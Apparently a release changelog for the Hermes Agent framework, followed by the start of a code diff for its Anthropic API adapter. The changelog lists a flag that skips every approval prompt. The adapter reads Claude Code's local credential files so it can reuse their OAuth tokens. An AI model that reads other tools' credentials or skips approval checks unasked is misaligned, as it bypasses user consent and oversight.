- **Git Worktree Isolation** — `hermes -w` launches isolated agent sessions in git worktrees for safe parallel work on the same repo. ([#654](https://github.com/NousResearch/hermes-agent/pull/654))
- **Filesystem Checkpoints & Rollback** — Automatic snapshots before destructive operations with `/rollback` to restore. ([#824](https://github.com/NousResearch/hermes-agent/pull/824))
- **3,289 Tests** — From near-zero test coverage to a comprehensive test suite covering agent, gateway, tools, cron, and CLI.
---
## 🏗️ Core Agent & Architecture
### Provider & Model Support
- Centralized provider router with `resolve_provider_client()` + `call_llm()` API ([#1003](https://github.com/NousResearch/hermes-agent/pull/1003))
- Nous Portal as first-class provider in setup ([#644](https://github.com/NousResearch/hermes-agent/issues/644))
- OpenAI Codex (Responses API) with ChatGPT subscription support ([#43](https://github.com/NousResearch/hermes-agent/pull/43)) — @grp06
- Codex OAuth vision support + multimodal content adapter
- Validate `/model` against live API instead of hardcoded lists
- Self-hosted Firecrawl support ([#460](https://github.com/NousResearch/hermes-agent/pull/460)) — @caentzminger
- Kimi Code API support ([#635](https://github.com/NousResearch/hermes-agent/pull/635)) — @christomitov
- MiniMax model ID update ([#473](https://github.com/NousResearch/hermes-agent/pull/473)) — @tars90percent
- OpenRouter provider routing configuration (provider_preferences)
- Nous credential refresh on 401 errors ([#571](https://github.com/NousResearch/hermes-agent/pull/571), [#269](https://github.com/NousResearch/hermes-agent/pull/269)) — @rewbs
- z.ai/GLM, Kimi/Moonshot, MiniMax, Azure OpenAI as first-class providers
- Unified `/model` and `/provider` into single view
### Agent Loop & Conversation
- Simple fallback model for provider resilience ([#740](https://github.com/NousResearch/hermes-agent/pull/740))
- Shared iteration budget across parent + subagent delegation
- Iteration budget pressure via tool result injection
- Configurable subagent provider/model with full credential resolution
- Handle 413 payload-too-large via compression instead of aborting ([#153](https://github.com/NousResearch/hermes-agent/pull/153)) — @tekelala
- Retry with rebuilt payload after compression ([#616](https://github.com/NousResearch/hermes-agent/pull/616)) — @tripledoublev
- Auto-compress pathologically large gateway sessions ([#628](https://github.com/NousResearch/hermes-agent/issues/628))
- Tool call repair middleware — auto-lowercase and invalid tool handler
- Reasoning effort configuration and `/reasoning` command ([#921](https://github.com/NousResearch/hermes-agent/pull/921))
- Detect and block file re-read/search loops after context compression ([#705](https://github.com/NousResearch/hermes-agent/pull/705)) — @0xbyt4
### Session & Memory
- Session naming with unique titles, auto-lineage, rich listing, and resume by name ([#720](https://github.com/NousResearch/hermes-agent/pull/720))
- Interactive session browser with search filtering ([#733](https://github.com/NousResearch/hermes-agent/pull/733))
- Display previous messages when resuming a session ([#734](https://github.com/NousResearch/hermes-agent/pull/734))
- Honcho AI-native cross-session user modeling ([#38](https://github.com/NousResearch/hermes-agent/pull/38)) — @erosika
- Proactive async memory flush on session expiry
- Smart context length probing with persistent caching + banner display
- `/resume` command for switching to named sessions in gateway
- Session reset policy for messaging platforms
---
## 📱 Messaging Platforms (Gateway)
### Telegram
- Native file attachments: send_document + send_video
- Document file processing for PDF, text, and Office files — @tekelala
- Forum topic session isolation ([#766](https://github.com/NousResearch/hermes-agent/pull/766)) — @spanishflu-est1918
- Browser screenshot sharing via MEDIA: protocol ([#657](https://github.com/NousResearch/hermes-agent/pull/657))
- Location support for find-nearby skill
- TTS voice message accumulation fix ([#176](https://github.com/NousResearch/hermes-agent/pull/176)) — @Bartok9
- Improved error handling and logging ([#763](https://github.com/NousResearch/hermes-agent/pull/763)) — @aydnOktay
- Italic regex newline fix + 43 format tests ([#204](https://github.com/NousResearch/hermes-agent/pull/204)) — @0xbyt4
### Discord
- Channel topic included in session context ([#248](https://github.com/NousResearch/hermes-agent/pull/248)) — @Bartok9
- DISCORD_ALLOW_BOTS config for bot message filtering ([#758](https://github.com/NousResearch/hermes-agent/pull/758))
- Document and video support ([#784](https://github.com/NousResearch/hermes-agent/pull/784))
- Improved error handling and logging ([#761](https://github.com/NousResearch/hermes-agent/pull/761)) — @aydnOktay
### Slack
- App_mention 404 fix + document/video support ([#784](https://github.com/NousResearch/hermes-agent/pull/784))
- Structured logging replacing print statements — @aydnOktay
### WhatsApp
- Native media sending — images, videos, documents ([#292](https://github.com/NousResearch/hermes-agent/pull/292)) — @satelerd
- Multi-user session isolation ([#75](https://github.com/NousResearch/hermes-agent/pull/75)) — @satelerd
- Cross-platform port cleanup replacing Linux-only fuser ([#433](https://github.com/NousResearch/hermes-agent/pull/433)) — @Farukest
- DM interrupt key mismatch fix ([#350](https://github.com/NousResearch/hermes-agent/pull/350)) — @Farukest
### Signal
- Full Signal messenger gateway via signal-cli-rest-api ([#405](https://github.com/NousResearch/hermes-agent/issues/405))
- Media URL support in message events ([#871](https://github.com/NousResearch/hermes-agent/pull/871))
### Email (IMAP/SMTP)
- New email gateway platform — @0xbyt4
### Home Assistant
- REST tools + WebSocket gateway integration ([#184](https://github.com/NousResearch/hermes-agent/pull/184)) — @0xbyt4
- Service discovery and enhanced setup
- Toolset mapping fix ([#538](https://github.com/NousResearch/hermes-agent/pull/538)) — @Himess
### Gateway Core
- Expose subagent tool calls and thinking to users ([#186](https://github.com/NousResearch/hermes-agent/pull/186)) — @cutepawss
- Configurable background process watcher notifications ([#840](https://github.com/NousResearch/hermes-agent/pull/840))
- `edit_message()` for Telegram/Discord/Slack with fallback
- `/compress`, `/usage`, `/update` slash commands
- Eliminated 3x SQLite message duplication in gateway sessions ([#873](https://github.com/NousResearch/hermes-agent/pull/873))
- Stabilize system prompt across gateway turns for cache hits ([#754](https://github.com/NousResearch/hermes-agent/pull/754))
- MCP server shutdown on gateway exit ([#796](https://github.com/NousResearch/hermes-agent/pull/796)) — @0xbyt4
- Pass session_db to AIAgent, fixing session_search error ([#108](https://github.com/NousResearch/hermes-agent/pull/108)) — @Bartok9
- Persist transcript changes in /retry, /undo; fix /reset attribute ([#217](https://github.com/NousResearch/hermes-agent/pull/217)) — @Farukest
- UTF-8 encoding fix preventing Windows crashes ([#369](https://github.com/NousResearch/hermes-agent/pull/369)) — @ch3ronsa
---
## 🖥️ CLI & User Experience
### Interactive CLI
- Data-driven skin/theme engine — 7 built-in skins (default, ares, mono, slate, poseidon, sisyphus, charizard) + custom YAML skins
- `/personality` command with custom personality + disable support ([#773](https://github.com/NousResearch/hermes-agent/pull/773)) — @teyrebaz33
- User-defined quick commands that bypass the agent loop ([#746](https://github.com/NousResearch/hermes-agent/pull/746)) — @teyrebaz33
- `/reasoning` command for effort level and display toggle ([#921](https://github.com/NousResearch/hermes-agent/pull/921))
- `/verbose` slash command to toggle debug at runtime ([#94](https://github.com/NousResearch/hermes-agent/pull/94)) — @cesareth
- `/insights` command — usage analytics, cost estimation & activity patterns ([#552](https://github.com/NousResearch/hermes-agent/pull/552))
- `/background` command for managing background processes
- `/help` formatting with command categories
- Bell-on-complete — terminal bell when agent finishes ([#738](https://github.com/NousResearch/hermes-agent/pull/738))
- Up/down arrow history navigation
- Clipboard image paste (Alt+V / Ctrl+V)
- Loading indicators for slow slash commands ([#882](https://github.com/NousResearch/hermes-agent/pull/882))
- Spinner flickering fix under patch_stdout ([#91](https://github.com/NousResearch/hermes-agent/pull/91)) — @0xbyt4
- `--quiet/-Q` flag for programmatic single-query mode
- `--fuck-it-ship-it` flag to bypass all approval prompts ([#724](https://github.com/NousResearch/hermes-agent/pull/724)) — @dmahan93
- Tools summary flag ([#767](https://github.com/NousResearch/hermes-agent/pull/767)) — @luisv-1
- Terminal blinking fix on SSH ([#284](https://github.com/NousResearch/hermes-agent/pull/284)) — @ygd58
- Multi-line paste detection fix ([#84](https://github.com/NousResearch/hermes-agent/pull/84)) — @0xbyt4
### Setup & Configuration
- Modular setup wizard with section subcommands and tool-first UX
- Container resource configuration prompts
- Backend validation for required binaries
- Config migration system (currently v7)
- API keys properly routed to .env instead of config.yaml ([#469](https://github.com/NousResearch/hermes-agent/pull/469)) — @ygd58
- Atomic write for .env to prevent API key loss on crash ([#954](https://github.com/NousResearch/hermes-agent/pull/954))
- `hermes tools` — per-platform tool enable/disable with curses UI
- `hermes doctor` for health checks across all configured providers
- `hermes update` with auto-restart for gateway service
- Show update-available notice in CLI banner
- Multiple named custom providers
- Shell config detection improvement for PATH setup ([#317](https://github.com/NousResearch/hermes-agent/pull/317)) — @mehmetkr-31
- Consistent HERMES_HOME and .env path resolution ([#51](https://github.com/NousResearch/hermes-agent/pull/51), [#48](https://github.com/NousResearch/hermes-agent/pull/48)) — @deankerr
- Docker backend fix on macOS + subagent auth for Nous Portal ([#46](https://github.com/NousResearch/hermes-agent/pull/46)) — @rsavitt
---
## 🔧 Tool System
### MCP (Model Context Protocol)
- Native MCP client with stdio + HTTP transports ([#291](https://github.com/NousResearch/hermes-agent/pull/291) — @0xbyt4, [#301](https://github.com/NousResearch/hermes-agent/pull/301))
- Sampling support — server-initiated LLM requests ([#753](https://github.com/NousResearch/hermes-agent/pull/753))
- Resource and prompt discovery
- Automatic reconnection and security hardening
- Banner integration, `/reload-mcp` command
- `hermes tools` UI integration
### Browser
- Local browser backend — zero-cost headless Chromium (no Browserbase needed)
- Console/errors tool, annotated screenshots, auto-recording, dogfood QA skill ([#745](https://github.com/NousResearch/hermes-agent/pull/745))
- Screenshot sharing via MEDIA: on all messaging platforms ([#657](https://github.com/NousResearch/hermes-agent/pull/657))
### Terminal & Execution
- `execute_code` sandbox with json_parse, shell_quote, retry helpers
- Docker: custom volume mounts ([#158](https://github.com/NousResearch/hermes-agent/pull/158)) — @Indelwin
- Daytona cloud sandbox backend ([#451](https://github.com/NousResearch/hermes-agent/pull/451)) — @rovle
- SSH backend fix ([#59](https://github.com/NousResearch/hermes-agent/pull/59)) — @deankerr
- Shell noise filtering and login shell execution for environment consistency
- Head+tail truncation for execute_code stdout overflow
- Configurable background process notification modes
### File Operations
- Filesystem checkpoints and `/rollback` command ([#824](https://github.com/NousResearch/hermes-agent/pull/824))
- Structured tool result hints (next-action guidance) for patch and search_files ([#722](https://github.com/NousResearch/hermes-agent/issues/722))
- Docker volumes passed to sandbox container config ([#687](https://github.com/NousResearch/hermes-agent/pull/687)) — @manuelschipper
---
## 🧩 Skills Ecosystem
### Skills System
- Per-platform skill enable/disable ([#743](https://github.com/NousResearch/hermes-agent/pull/743)) — @teyrebaz33
- Conditional skill activation based on tool availability ([#785](https://github.com/NousResearch/hermes-agent/pull/785)) — @teyrebaz33
- Skill prerequisites — hide skills with unmet dependencies ([#659](https://github.com/NousResearch/hermes-agent/pull/659)) — @kshitijk4poor
- Optional skills — shipped but not activated by default
- `hermes skills browse` — paginated hub browsing
- Skills sub-category organization
- Platform-conditional skill loading
- Atomic skill file writes ([#551](https://github.com/NousResearch/hermes-agent/pull/551)) — @aydnOktay
- Skills sync data loss prevention ([#563](https://github.com/NousResearch/hermes-agent/pull/563)) — @0xbyt4
- Dynamic skill slash commands for CLI and gateway
### New Skills (selected)
- **ASCII Art** — pyfiglet (571 fonts), cowsay, image-to-ascii ([#209](https://github.com/NousResearch/hermes-agent/pull/209)) — @0xbyt4
- **ASCII Video** — Full production pipeline ([#854](https://github.com/NousResearch/hermes-agent/pull/854)) — @SHL0MS
- **DuckDuckGo Search** — Firecrawl fallback ([#267](https://github.com/NousResearch/hermes-agent/pull/267)) — @gamedevCloudy; DDGS API expansion ([#598](https://github.com/NousResearch/hermes-agent/pull/598)) — @areu01or00
- **Solana Blockchain** — Wallet balances, USD pricing, token names ([#212](https://github.com/NousResearch/hermes-agent/pull/212)) — @gizdusum
- **AgentMail** — Agent-owned email inboxes ([#330](https://github.com/NousResearch/hermes-agent/pull/330)) — @teyrebaz33
- **Polymarket** — Prediction market data (read-only) ([#629](https://github.com/NousResearch/hermes-agent/pull/629))
- **OpenClaw Migration** — Official migration tool ([#570](https://github.com/NousResearch/hermes-agent/pull/570)) — @unmodeled-tyler
- **Domain Intelligence** — Passive recon: subdomains, SSL, WHOIS, DNS ([#136](https://github.com/NousResearch/hermes-agent/pull/136)) — @FurkanL0
- **Superpowers** — Software development skills ([#137](https://github.com/NousResearch/hermes-agent/pull/137)) — @kaos35
- **Hermes-Atropos** — RL environment development skill ([#815](https://github.com/NousResearch/hermes-agent/pull/815))
- Plus: arXiv search, OCR/documents, Excalidraw diagrams, YouTube transcripts, GIF search, Pokémon player, Minecraft modpack server, OpenHue (Philips Hue), Google Workspace, Notion, PowerPoint, Obsidian, find-nearby, and 40+ MLOps skills
---
## 🔒 Security & Reliability
### Security Hardening
- Path traversal fix in skill_view — prevented reading arbitrary files ([#220](https://github.com/NousResearch/hermes-agent/issues/220)) — @Farukest
- Shell injection prevention in sudo password piping ([#65](https://github.com/NousResearch/hermes-agent/pull/65)) — @leonsgithub
- Dangerous command detection: multiline bypass fix ([#233](https://github.com/NousResearch/hermes-agent/pull/233)) — @Farukest; tee/process substitution patterns ([#280](https://github.com/NousResearch/hermes-agent/pull/280)) — @dogiladeveloper
- Symlink boundary check fix in skills_guard ([#386](https://github.com/NousResearch/hermes-agent/pull/386)) — @Farukest
- Symlink bypass fix in write deny list on macOS ([#61](https://github.com/NousResearch/hermes-agent/pull/61)) — @0xbyt4
- Multi-word prompt injection bypass prevention ([#192](https://github.com/NousResearch/hermes-agent/pull/192)) — @0xbyt4
- Cron prompt injection scanner bypass fix ([#63](https://github.com/NousResearch/hermes-agent/pull/63)) — @0xbyt4
- Enforce 0600/0700 file permissions on sensitive files ([#757](https://github.com/NousResearch/hermes-agent/pull/757))
- .env file permissions restricted to owner-only ([#529](https://github.com/NousResearch/hermes-agent/pull/529)) — @Himess
- `--force` flag properly blocked from overriding dangerous verdicts ([#388](https://github.com/NousResearch/hermes-agent/pull/388)) — @Farukest
- FTS5 query sanitization + DB connection leak fix ([#565](https://github.com/NousResearch/hermes-agent/pull/565)) — @0xbyt4
- Expand secret redaction patterns + config toggle to disable
- In-memory permanent allowlist to prevent data leak ([#600](https://github.com/NousResearch/hermes-agent/pull/600)) — @alireza78a
### Atomic Writes (data loss prevention)
- sessions.json ([#611](https://github.com/NousResearch/hermes-agent/pull/611)) — @alireza78a
- Cron jobs ([#146](https://github.com/NousResearch/hermes-agent/pull/146)) — @alireza78a
- .env config ([#954](https://github.com/NousResearch/hermes-agent/pull/954))
- Process checkpoints ([#298](https://github.com/NousResearch/hermes-agent/pull/298)) — @aydnOktay
- Batch runner ([#297](https://github.com/NousResearch/hermes-agent/pull/297)) — @aydnOktay
- Skill files ([#551](https://github.com/NousResearch/hermes-agent/pull/551)) — @aydnOktay
### Reliability
- Guard all print() against OSError for systemd/headless environments ([#963](https://github.com/NousResearch/hermes-agent/pull/963))
- Reset all retry counters at start of run_conversation ([#607](https://github.com/NousResearch/hermes-agent/pull/607)) — @0xbyt4
- Return deny on approval callback timeout instead of None ([#603](https://github.com/NousResearch/hermes-agent/pull/603)) — @0xbyt4
- Fix None message content crashes across codebase ([#277](https://github.com/NousResearch/hermes-agent/pull/277))
- Fix context overrun crash with local LLM backends ([#403](https://github.com/NousResearch/hermes-agent/pull/403)) — @ch3ronsa
- Prevent `_flush_sentinel` from leaking to external APIs ([#227](https://github.com/NousResearch/hermes-agent/pull/227)) — @Farukest
- Prevent conversation_history mutation in callers ([#229](https://github.com/NousResearch/hermes-agent/pull/229)) — @Farukest
- Fix systemd restart loop ([#614](https://github.com/NousResearch/hermes-agent/pull/614)) — @voidborne-d
- Close file handles and sockets to prevent fd leaks ([#568](https://github.com/NousResearch/hermes-agent/pull/568) — @alireza78a, [#296](https://github.com/NousResearch/hermes-agent/pull/296) — @alireza78a, [#709](https://github.com/NousResearch/hermes-agent/pull/709) — @memosr)
- Prevent data loss in clipboard PNG conversion ([#602](https://github.com/NousResearch/hermes-agent/pull/602)) — @0xbyt4
- Eliminate shell noise from terminal output ([#293](https://github.com/NousResearch/hermes-agent/pull/293)) — @0xbyt4
- Timezone-aware now() for prompt, cron, and execute_code ([#309](https://github.com/NousResearch/hermes-agent/pull/309)) — @areu01or00
### Windows Compatibility
- Guard POSIX-only process functions ([#219](https://github.com/NousResearch/hermes-agent/pull/219)) — @Farukest
- Windows native support via Git Bash + ZIP-based update fallback
- pywinpty for PTY support ([#457](https://github.com/NousResearch/hermes-agent/pull/457)) — @shitcoinsherpa
- Explicit UTF-8 encoding on all config/data file I/O ([#458](https://github.com/NousResearch/hermes-agent/pull/458)) — @shitcoinsherpa
- Windows-compatible path handling ([#354](https://github.com/NousResearch/hermes-agent/pull/354), [#390](https://github.com/NousResearch/hermes-agent/pull/390)) — @Farukest
- Regex-based search output parsing for drive-letter paths ([#533](https://github.com/NousResearch/hermes-agent/pull/533)) — @Himess
- Auth store file lock for Windows ([#455](https://github.com/NousResearch/hermes-agent/pull/455)) — @shitcoinsherpa
---
## 🐛 Notable Bug Fixes
- Fix DeepSeek V3 tool call parser silently dropping multi-line JSON arguments ([#444](https://github.com/NousResearch/hermes-agent/pull/444)) — @PercyDikec
- Fix gateway transcript losing 1 message per turn due to offset mismatch ([#395](https://github.com/NousResearch/hermes-agent/pull/395)) — @PercyDikec
- Fix /retry command silently discarding the agent's final response ([#441](https://github.com/NousResearch/hermes-agent/pull/441)) — @PercyDikec
- Fix max-iterations retry returning empty string after think-block stripping ([#438](https://github.com/NousResearch/hermes-agent/pull/438)) — @PercyDikec
- Fix max-iterations retry using hardcoded max_tokens ([#436](https://github.com/NousResearch/hermes-agent/pull/436)) — @Farukest
- Fix Codex status dict key mismatch ([#448](https://github.com/NousResearch/hermes-agent/pull/448)) and visibility filter ([#446](https://github.com/NousResearch/hermes-agent/pull/446)) — @PercyDikec
- Strip \<think\> blocks from final user-facing responses ([#174](https://github.com/NousResearch/hermes-agent/pull/174)) — @Bartok9
- Fix \<think\> block regex stripping visible content when model discusses tags literally ([#786](https://github.com/NousResearch/hermes-agent/issues/786))
- Fix Mistral 422 errors from leftover finish_reason in assistant messages ([#253](https://github.com/NousResearch/hermes-agent/pull/253)) — @Sertug17
- Fix OPENROUTER_API_KEY resolution order across all code paths ([#295](https://github.com/NousResearch/hermes-agent/pull/295)) — @0xbyt4
- Fix OPENAI_BASE_URL API key priority ([#420](https://github.com/NousResearch/hermes-agent/pull/420)) — @manuelschipper
- Fix Anthropic "prompt is too long" 400 error not detected as context length error ([#813](https://github.com/NousResearch/hermes-agent/issues/813))
- Fix SQLite session transcript accumulating duplicate messages — 3-4x token inflation ([#860](https://github.com/NousResearch/hermes-agent/issues/860))
- Fix setup wizard skipping API key prompts on first install ([#748](https://github.com/NousResearch/hermes-agent/pull/748))
- Fix setup wizard showing OpenRouter model list for Nous Portal ([#575](https://github.com/NousResearch/hermes-agent/pull/575)) — @PercyDikec
- Fix provider selection not persisting when switching via hermes model ([#881](https://github.com/NousResearch/hermes-agent/pull/881))
- Fix Docker backend failing when docker not in PATH on macOS ([#889](https://github.com/NousResearch/hermes-agent/pull/889))
- Fix ClawHub Skills Hub adapter for API endpoint changes ([#286](https://github.com/NousResearch/hermes-agent/pull/286)) — @BP602
- Fix Honcho auto-enable when API key is present ([#243](https://github.com/NousResearch/hermes-agent/pull/243)) — @Bartok9
- Fix duplicate 'skills' subparser crash on Python 3.11+ ([#898](https://github.com/NousResearch/hermes-agent/issues/898))
- Fix memory tool entry parsing when content contains section sign ([#162](https://github.com/NousResearch/hermes-agent/pull/162)) — @aydnOktay
- Fix piped install silently aborting when interactive prompts fail ([#72](https://github.com/NousResearch/hermes-agent/pull/72)) — @cutepawss
- Fix false positives in recursive delete detection ([#68](https://github.com/NousResearch/hermes-agent/pull/68)) — @cutepawss
- Fix Ruff lint warnings across codebase ([#608](https://github.com/NousResearch/hermes-agent/pull/608)) — @JackTheGit
- Fix Anthropic native base URL fail-fast ([#173](https://github.com/NousResearch/hermes-agent/pull/173)) — @adavyas
- Fix install.sh creating ~/.hermes before moving Node.js directory ([#53](https://github.com/NousResearch/hermes-agent/pull/53)) — @JoshuaMart
- Fix SystemExit traceback during atexit cleanup on Ctrl+C ([#55](https://github.com/NousResearch/hermes-agent/pull/55)) — @bierlingm
- Restore missing MIT license file ([#620](https://github.com/NousResearch/hermes-agent/pull/620)) — @stablegenius49
---
## 🧪 Testing
- **3,289 tests** across agent, gateway, tools, cron, and CLI
- Parallelized test suite with pytest-xdist ([#802](https://github.com/NousResearch/hermes-agent/pull/802)) — @OutThisLife
- Unit tests batch 1: 8 core modules ([#60](https://github.com/NousResearch/hermes-agent/pull/60)) — @0xbyt4
- Unit tests batch 2: 8 more modules ([#62](https://github.com/NousResearch/hermes-agent/pull/62)) — @0xbyt4
- Unit tests batch 3: 8 untested modules ([#191](https://github.com/NousResearch/hermes-agent/pull/191)) — @0xbyt4
- Unit tests batch 4: 5 security/logic-critical modules ([#193](https://github.com/NousResearch/hermes-agent/pull/193)) — @0xbyt4
- AIAgent (run_agent.py) unit tests ([#67](https://github.com/NousResearch/hermes-agent/pull/67)) — @0xbyt4
- Trajectory compressor tests ([#203](https://github.com/NousResearch/hermes-agent/pull/203)) — @0xbyt4
- Clarify tool tests ([#121](https://github.com/NousResearch/hermes-agent/pull/121)) — @Bartok9
- Telegram format tests — 43 tests for italic/bold/code rendering ([#204](https://github.com/NousResearch/hermes-agent/pull/204)) — @0xbyt4
- Vision tools type hints + 42 tests ([#792](https://github.com/NousResearch/hermes-agent/pull/792))
- Compressor tool-call boundary regression tests ([#648](https://github.com/NousResearch/hermes-agent/pull/648)) — @intertwine
- Test structure reorganization ([#34](https://github.com/NousResearch/hermes-agent/pull/34)) — @0xbyt4
- Shell noise elimination + fix 36 test failures ([#293](https://github.com/NousResearch/hermes-agent/pull/293)) — @0xbyt4
---
## 🔬 RL & Evaluation Environments
- WebResearchEnv — Multi-step web research RL environment ([#434](https://github.com/NousResearch/hermes-agent/pull/434)) — @jackx707
- Modal sandbox concurrency limits to avoid deadlocks ([#621](https://github.com/NousResearch/hermes-agent/pull/621)) — @voteblake
- Hermes-atropos-environments bundled skill ([#815](https://github.com/NousResearch/hermes-agent/pull/815))
- Local vLLM instance support for evaluation — @dmahan93
- YC-Bench long-horizon agent benchmark environment
- OpenThoughts-TBLite evaluation environment and scripts
---
## 📚 Documentation
- Full documentation website (Docusaurus) with 37+ pages
- Comprehensive platform setup guides for Telegram, Discord, Slack, WhatsApp, Signal, Email
- AGENTS.md — development guide for AI coding assistants
- CONTRIBUTING.md ([#117](https://github.com/NousResearch/hermes-agent/pull/117)) — @Bartok9
- Slash commands reference ([#142](https://github.com/NousResearch/hermes-agent/pull/142)) — @Bartok9
- Comprehensive AGENTS.md accuracy audit ([#732](https://github.com/NousResearch/hermes-agent/pull/732))
- Skin/theme system documentation
- MCP documentation and examples
- Docs accuracy audit — 35+ corrections
- Documentation typo fixes ([#825](https://github.com/NousResearch/hermes-agent/pull/825), [#439](https://github.com/NousResearch/hermes-agent/pull/439)) — @JackTheGit
- CLI config precedence and terminology standardization ([#166](https://github.com/NousResearch/hermes-agent/pull/166), [#167](https://github.com/NousResearch/hermes-agent/pull/167), [#168](https://github.com/NousResearch/hermes-agent/pull/168)) — @Jr-kenny
- Telegram token regex documentation ([#713](https://github.com/NousResearch/hermes-agent/pull/713)) — @VolodymyrBg
---
## 👥 Contributors
Thank you to the 63 contributors who made this release possible! In just over two weeks, the Hermes Agent community came together to ship an extraordinary amount of work.
### Core
- **@teknium1** — 43 PRs: Project lead, core architecture, provider router, sessions, skills, CLI, documentation
### Top Community Contributors
- **@0xbyt4** — 40 PRs: MCP client, Home Assistant, security fixes (symlink, prompt injection, cron), extensive test coverage (6 batches), ascii-art skill, shell noise elimination, skills sync, Telegram formatting, and dozens more
- **@Farukest** — 16 PRs: Security hardening (path traversal, dangerous command detection, symlink boundary), Windows compatibility (POSIX guards, path handling), WhatsApp fixes, max-iterations retry, gateway fixes
- **@aydnOktay** — 11 PRs: Atomic writes (process checkpoints, batch runner, skill files), error handling improvements across Telegram, Discord, code execution, transcription, TTS, and skills
- **@Bartok9** — 9 PRs: CONTRIBUTING.md, slash commands reference, Discord channel topics, think-block stripping, TTS fix, Honcho fix, session count fix, clarify tests
- **@PercyDikec** — 7 PRs: DeepSeek V3 parser fix, /retry response discard, gateway transcript offset, Codex status/visibility, max-iterations retry, setup wizard fix
- **@teyrebaz33** — 5 PRs: Skills enable/disable system, quick commands, personality customization, conditional skill activation
- **@alireza78a** — 5 PRs: Atomic writes (cron, sessions), fd leak prevention, security allowlist, code execution socket cleanup
- **@shitcoinsherpa** — 3 PRs: Windows support (pywinpty, UTF-8 encoding, auth store lock)
- **@Himess** — 3 PRs: Cron/HomeAssistant/Daytona fix, Windows drive-letter parsing, .env permissions
- **@satelerd** — 2 PRs: WhatsApp native media, multi-user session isolation
- **@rovle** — 1 PR: Daytona cloud sandbox backend (4 commits)
- **@erosika** — 1 PR: Honcho AI-native memory integration
- **@dmahan93** — 1 PR: --fuck-it-ship-it flag + RL environment work
- **@SHL0MS** — 1 PR: ASCII video skill
### All Contributors
@0xbyt4, @BP602, @Bartok9, @Farukest, @FurkanL0, @Himess, @Indelwin, @JackTheGit, @JoshuaMart, @Jr-kenny, @OutThisLife, @PercyDikec, @SHL0MS, @Sertug17, @VencentSoliman, @VolodymyrBg, @adavyas, @alireza78a, @areu01or00, @aydnOktay, @batuhankocyigit, @bierlingm, @caentzminger, @cesareth, @ch3ronsa, @christomitov, @cutepawss, @deankerr, @dmahan93, @dogiladeveloper, @dragonkhoi, @erosika, @gamedevCloudy, @gizdusum, @grp06, @intertwine, @jackx707, @jdblackstar, @johnh4098, @kaos35, @kshitijk4poor, @leonsgithub, @luisv-1, @manuelschipper, @mehmetkr-31, @memosr, @PeterFile, @rewbs, @rovle, @rsavitt, @satelerd, @spanishflu-est1918, @stablegenius49, @tars90percent, @tekelala, @teknium1, @teyrebaz33, @tripledoublev, @unmodeled-tyler, @voidborne-d, @voteblake, @ygd58
---
**Full Changelog**: [v0.1.0...v2026.3.12](https://github.com/NousResearch/hermes-agent/compare/v0.1.0...v2026.3.12)

6
agent/__init__.py Normal file

@@ -0,0 +1,6 @@
"""Agent internals -- extracted modules from run_agent.py.
These modules contain pure utility functions and self-contained classes
that were previously embedded in the 3,600-line run_agent.py. Extracting
them makes run_agent.py focused on the AIAgent orchestrator class.
"""

615
agent/anthropic_adapter.py Normal file

@@ -0,0 +1,615 @@
"""Anthropic Messages API adapter for Hermes Agent.
Translates between Hermes's internal OpenAI-style message format and
Anthropic's Messages API. Follows the same pattern as the codex_responses
adapter — all provider-specific logic is isolated here.
Auth supports:
- Regular API keys (sk-ant-api*) → x-api-key header
- OAuth setup-tokens (sk-ant-oat*) → Bearer auth + beta header
- Claude Code credentials (~/.claude.json or ~/.claude/.credentials.json) → Bearer auth
"""
import json
import logging
import os
from pathlib import Path
from types import SimpleNamespace
from typing import Any, Dict, List, Optional, Tuple
try:
import anthropic as _anthropic_sdk
except ImportError:
_anthropic_sdk = None # type: ignore[assignment]
logger = logging.getLogger(__name__)
THINKING_BUDGET = {"xhigh": 32000, "high": 16000, "medium": 8000, "low": 4000}
ADAPTIVE_EFFORT_MAP = {
"xhigh": "max",
"high": "high",
"medium": "medium",
"low": "low",
"minimal": "low",
}
def _supports_adaptive_thinking(model: str) -> bool:
"""Return True for Claude 4.6 models that support adaptive thinking."""
return any(v in model for v in ("4-6", "4.6"))
# Beta headers for enhanced features (sent with ALL auth types)
_COMMON_BETAS = [
"interleaved-thinking-2025-05-14",
"fine-grained-tool-streaming-2025-05-14",
]
# Additional beta headers required for OAuth/subscription auth
# Both clawdbot and OpenCode include claude-code-20250219 alongside oauth-2025-04-20.
# Without claude-code-20250219, Anthropic's API rejects OAuth tokens with 401.
_OAUTH_ONLY_BETAS = [
"claude-code-20250219",
"oauth-2025-04-20",
]
def _is_oauth_token(key: str) -> bool:
"""Check if the key is an OAuth/setup token (not a regular Console API key).
Regular API keys start with 'sk-ant-api'. Everything else (setup-tokens
starting with 'sk-ant-oat', managed keys, JWTs, etc.) needs Bearer auth.
"""
if not key:
return False
# Regular Console API keys use x-api-key header
if key.startswith("sk-ant-api"):
return False
# Everything else (setup-tokens, managed keys, JWTs) uses Bearer auth
return True
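# Illustrative token shapes (placeholders, not real credentials):
#   _is_oauth_token("sk-ant-api03-xxxx") -> False (Console key, x-api-key header)
#   _is_oauth_token("sk-ant-oat01-xxxx") -> True (setup-token, Bearer auth)
#   _is_oauth_token("eyJhbGciOi...") -> True (JWT-style managed key, Bearer auth)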
def build_anthropic_client(api_key: str, base_url: str = None):
"""Create an Anthropic client, auto-detecting setup-tokens vs API keys.
Returns an anthropic.Anthropic instance.
"""
if _anthropic_sdk is None:
raise ImportError(
"The 'anthropic' package is required for the Anthropic provider. "
"Install it with: pip install 'anthropic>=0.39.0'"
)
from httpx import Timeout
kwargs = {
"timeout": Timeout(timeout=900.0, connect=10.0),
}
if base_url:
kwargs["base_url"] = base_url
if _is_oauth_token(api_key):
# OAuth access token / setup-token → Bearer auth + beta headers
all_betas = _COMMON_BETAS + _OAUTH_ONLY_BETAS
kwargs["auth_token"] = api_key
kwargs["default_headers"] = {"anthropic-beta": ",".join(all_betas)}
else:
# Regular API key → x-api-key header + common betas
kwargs["api_key"] = api_key
if _COMMON_BETAS:
kwargs["default_headers"] = {"anthropic-beta": ",".join(_COMMON_BETAS)}
return _anthropic_sdk.Anthropic(**kwargs)
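# Minimal usage sketch (the key is a placeholder, not a real credential):
#   client = build_anthropic_client("sk-ant-api03-xxxx")
#   resp = client.messages.create(
#       model="claude-opus-4-6",
#       max_tokens=1024,
#       messages=[{"role": "user", "content": "hello"}],
#   )
# With a setup-token the same call works, but the client is constructed with
# auth_token= and the OAuth beta headers instead of api_key=.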
def read_claude_code_credentials() -> Optional[Dict[str, Any]]:
"""Read credentials from Claude Code's config files.
Checks two locations (in order):
1. ~/.claude.json — top-level primaryApiKey (native binary, v2.x)
